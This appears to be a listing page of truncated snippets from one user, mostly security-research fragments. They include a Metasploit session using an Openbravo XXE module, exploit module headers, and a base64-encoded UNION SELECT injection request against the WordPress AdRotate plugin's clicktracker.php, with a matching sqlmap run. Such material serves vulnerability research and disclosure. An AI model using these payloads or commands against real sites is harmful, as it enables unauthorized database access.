brandonprry

using System;

namespace floor
{
	class MainClass
	{
		public static void Main (string[] args)
		{
			Random r = new Random ();

brandonprry

H4sIAJ4t9FEAA+z9a3BkydYoBvXlGnAX2OZp3ianWmdUmilVqUqPnpZU+o6krp6Wj1rSJ6lnznxH
c4pdVVvSnq7au87eVVJrenR/mSCAgIAIBxgHF/7cMDiACCDiYh73B4YgMAQvgyPgB3CDH/iHwWBf
+758fbmsR2buzP2oKj26p3uONNMq1d6ZKzNXrly51sq1Vp650dALvEFrsbJQffR+fhbg5+nyMn7W
ni4vmJ/q51GtXnu69HR5caX+9NFCDf5efiSW31N/rJ9RNHRCIR65o547rtyk95/oz5k5/7s72829
7eZ908FU819bebq0CI9XajD/iwsLSw/z/yF+Muf/bNCbh++V4dvhfbQxdv5rC0vLtcXE/C+tLML8
L9xH45N+/sjnX2T8fL33Wnzd3Gsebu6Kg9dbQBWCKOOoWcgqDj/fuGHkBb5YLIv6M/GPjnxX1GHO
CwWxHQyuQu/sfChK23P0ULwIXVccBafDSyd0xYtg5HcdoEG/LHb8TkWsnw+Hg9Vq9TQ6rQThWXWj
IJoXbngVAFAvEgM37HvDodsVw0B0ALpw/K7oetEw9NqjoSugbBvg9fGl50YFEZyK4TnU7Hkd149c
0Q06o77rD8sCyovOueOfef6Z8IYI3g+Gwun1gku3WynkDZd+DkLX6bd7LpY6PncZa67vhk5PHIza
0JrYlS0CXEecwrDL1OOeezrUvTkNwkKkkIFDCYbnbijeeH43wq5fBuGbqKIakbUirCb6QTQUGXUH

brandonprry

bperry@w00den-pickle:~/Projects/metasploit-framework$ ./msfconsole -q
msf > use auxiliary/admin/http/openbravo_xxe
msf auxiliary(openbravo_xxe) > set RHOST 192.168.1.8
RHOST => 192.168.1.8
msf auxiliary(openbravo_xxe) > show options

Module options (auxiliary/admin/http/openbravo_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------

brandonprry

branperry-mbk:~ brandon.perry$ ruby syntax 
2.725053
branperry-mbk:~ brandon.perry$ ruby to_sym 
2.451621
branperry-mbk:~ brandon.perry$ ruby syntax 
2.768495
branperry-mbk:~ brandon.perry$ ruby to_sym 
2.47925
branperry-mbk:~ brandon.perry$ cat to_sym 
x = Time.now

brandonprry

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

brandonprry

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest/md5'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

brandonprry

GET /wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gQUxMIFNFTEVDVCAzLDEsMSwxLS0= HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
Host: 192.168.1.63


--------

brandonprry

bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode

    sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:18:53

brandonprry

HTTP request [#1]:
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-58eac36 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.63
Pragma: no-cache
Cache-control: no-cache,no-store

brandonprry

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary